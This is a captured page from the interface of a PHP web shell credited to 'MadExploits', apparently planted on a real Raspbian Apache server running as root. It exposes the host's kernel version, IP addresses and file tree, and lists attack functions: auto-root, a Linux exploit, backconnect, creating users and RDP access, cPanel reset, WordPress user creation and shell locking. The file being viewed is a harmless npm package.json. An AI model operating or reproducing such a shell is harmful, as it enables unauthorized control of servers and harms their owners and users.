Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
nodejs /
spdx-license-ids /
[ HOME SHELL ]
Name
Size
Permission
Action
package.json
1.2
KB
-rw-r--r--
spdx-license-ids.json
4.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "spdx-license-ids", "version": "1.2.2", "description": "A list of SPDX license identifiers", "repository": "shinnn/spdx-license-ids", "author": "Shinnosuke Watanabe (https://github.com/shinnn)", "scripts": { "build": "node --strong_mode build.js", "lint": "eslint --config @shinnn/node --env browser --ignore-path .gitignore .", "pretest": "${npm_package_scripts_build} && ${npm_package_scripts_lint}", "test": "node --strong_mode test.js | tap-spec", "coverage": "node --strong_mode node_modules/.bin/istanbul cover test.js" }, "license": "Unlicense", "main": "spdx-license-ids.json", "files": [ "spdx-license-ids.json" ], "keywords": [ "spdx", "license", "licenses", "id", "identifier", "identifiers", "json", "array", "oss", "browser", "client-side" ], "devDependencies": { "@shinnn/eslint-config-node": "^3.0.0", "chalk": "^1.1.3", "eslint": "^3.1.1", "get-spdx-license-ids": "^1.0.0", "istanbul": "^0.4.4", "loud-rejection": "^1.6.0", "rimraf-promise": "^2.0.0", "stringify-object": "^2.4.0", "tap-spec": "^4.1.1", "tape": "^4.6.0", "write-file-atomically": "1.0.0" } }
Close